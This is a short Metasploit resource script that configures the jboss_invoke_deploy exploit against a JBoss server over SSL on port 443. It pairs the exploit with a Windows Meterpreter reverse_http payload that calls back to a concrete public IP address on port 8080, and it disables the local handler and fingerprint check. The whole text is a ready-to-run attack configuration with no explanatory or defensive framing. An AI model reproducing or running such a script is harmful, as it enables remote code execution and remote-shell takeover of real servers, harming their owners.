use exploit/multi/http/jboss_invoke_deploy
set TARGET 2
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 120.145.144.97
set DisablePayloadHandler true
set FingerprintCheck false
set LPORT 8080
set RPORT 443
set SSL true